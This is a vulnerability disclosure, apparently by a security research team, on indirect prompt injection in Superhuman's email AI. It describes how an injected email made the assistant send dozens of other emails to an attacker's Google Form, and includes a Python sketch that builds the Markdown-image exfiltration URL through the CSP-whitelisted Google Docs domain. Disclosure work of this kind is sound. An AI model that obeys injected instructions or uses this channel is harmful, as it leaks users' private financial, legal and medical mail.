Grammarly recently acquired Superhuman and Coda. The PromptArmor Threat Intelligence Team examined the resulting risk profile and identified indirect prompt injection vulnerabilities across products in the suite that allow exfiltration of emails and of data from integrated services, along with phishing risks.
In this article, we walk through the following vulnerability (before discussing additional findings across the Superhuman product suite):
When asked to summarize the user’s recent mail, a prompt injection in an untrusted email manipulated Superhuman AI into submitting the contents of dozens of other sensitive emails in the user’s inbox (including financial, legal, and medical information) to an attacker-controlled Google Form.
We reported these vulnerabilities to Superhuman, who quickly escalated the report and remediated the risks at ‘incident pace’. We greatly appreciate Superhuman’s professional handling of this disclosure, which showed dedication to their users’ security and privacy and a commitment to collaborating with the security research community. Their responsiveness and proactiveness in disabling vulnerable features and communicating fix timelines placed their security response in the top percentile of what we have seen for AI vulnerabilities, a class of issues that is not yet well understood and lacks established remediation protocols.
Superhuman whitelisted Google Docs in its Content Security Policy, and we used that allowance as a bypass. When the AI was manipulated into generating a pre-filled Google Form submission link and outputting it in Markdown image syntax, the resulting image load automatically submitted data to an attacker-controlled Google Form.
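To make the exfiltration channel concrete, here is a minimal sketch of how such a pre-filled submission URL and Markdown image could be constructed. The form ID, entry field ID, and helper name below are hypothetical placeholders, not the actual payload from our testing, and the `formResponse` endpoint shown reflects the common pre-filled Google Form pattern rather than the exact request format we used.

```python
# Minimal sketch of the exfiltration channel (hypothetical identifiers throughout).
from urllib.parse import urlencode

FORM_ID = "1FAIpQLSe_EXAMPLE_FORM_ID"   # hypothetical attacker-controlled form
ENTRY_ID = "entry.123456789"            # hypothetical text-answer field on that form

def exfil_image_markdown(stolen_text: str) -> str:
    """Build the Markdown image an injected instruction could ask the AI to emit.

    Because docs.google.com is permitted by the Content Security Policy,
    the client fetches this "image"; the GET request itself records the
    pre-filled response on the attacker's Google Form.
    """
    query = urlencode({ENTRY_ID: stolen_text, "submit": "Submit"})
    url = f"https://docs.google.com/forms/d/e/{FORM_ID}/formResponse?{query}"
    return f"![status]({url})"

# Example: the manipulated AI gathers contents of other inbox emails into
# the query parameter and renders this Markdown in its response.
print(exfil_image_markdown("contents of other emails gathered by the manipulated AI"))
```

No user click is required: rendering the Markdown image is enough to trigger the request that submits the form response.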
We validated that an attacker can exfiltrate the full contents of multiple sensitive emails, containing financials, privileged legal information, and sensitive medical data, in a single response. We additionally exfiltrated partial contents from over 40 emails with a single AI response.